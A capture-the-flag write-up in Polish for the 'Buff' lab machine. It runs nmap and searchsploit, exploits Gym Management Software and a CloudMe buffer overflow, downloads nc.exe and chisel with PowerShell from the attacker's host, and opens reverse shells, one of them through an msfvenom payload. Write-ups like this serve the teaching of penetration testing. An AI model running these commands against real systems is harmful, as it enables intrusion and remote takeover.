Buff

Nmap

nmap -sC -sV -T5 -p- 10.10.10.198                 

PORT     STATE SERVICE    REASON          VERSION
7680/tcp open  pando-pub? syn-ack ttl 127
8080/tcp open  http       syn-ack ttl 127 Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut

User

W kontaktach mamy informację o systemie:

mrb3n’s Bro Hut
Made using Gym Management Software 1.0

searchsploit gym
--------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                       |  Path
--------------------------------------------------------------------- ---------------------------------
Gym Management System 1.0 - Unauthenticated Remote Code Execution    | php/webapps/48506.py
WordPress Plugin WPGYM - SQL Injection                               | php/webapps/42801.txt
--------------------------------------------------------------------- ---------------------------------

searchsploit -m 48506
python2 48506.py http://10.10.10.198:8080/

Mamy ograniczonego shella. Trzeba wrzucić nc.exe

powershell iwr http://10.10.14.17:8000/nc.exe -outfile c:\windows\system32\spool\drivers\color\nc.exe

c:\windows\system32\spool\drivers\color\nc.exe 10.10.14.28 9090 -e powershell.exe
PS C:\users\shaun\desktop> cat user.txt

164d26cfe2c92c27278f8826955af9f6

Administrator

w katalogu domowym znajdujemy plik
c:\users\shaun\downloads\cloudme_1112.exe

oraz sprawdzając otwarte porty netstatem widzimy lokalnie otwarty port 8888

musimy go forwardować “chisel’em”

./chisel server -p 9009 --reverse
powershell iwr http://10.10.14.28/chisel.exe -outfile c:\windows\system32\spool\drivers\color\chisel.exe

c:\windows\system32\spool\drivers\color\chisel.exe client 10.10.14.28:9009 R:127.0.0.1:8888:127.0.0.1:8888

Usługa nazywa się “CloudMe 1.11.2”
Jest dostępny exploit

searchsploit cloudme
------------------------------------------------ ---------------------------------
 Exploit Title                                  |  Path
------------------------------------------------ ---------------------------------
CloudMe 1.11.2 - Buffer Overflow (PoC)          | windows/remote/48389.py
CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR) | windows/local/48499.txt
------------------------------------------------ ---------------------------------


searchsploit -m 48389

Trzeba zmienić payload w exploicie

msfvenom -a x86 -p windows/exec CMD='c:\windows\system32\spool\drivers\color\nc.exe 10.10.14.28 9091 -e cmd.exe' -b '\x00\x0A\x0D' -f python
C:\Users\Administrator\Desktop>type root.txt

e68b54b30f0***b08fe51d65770

Leave a Comment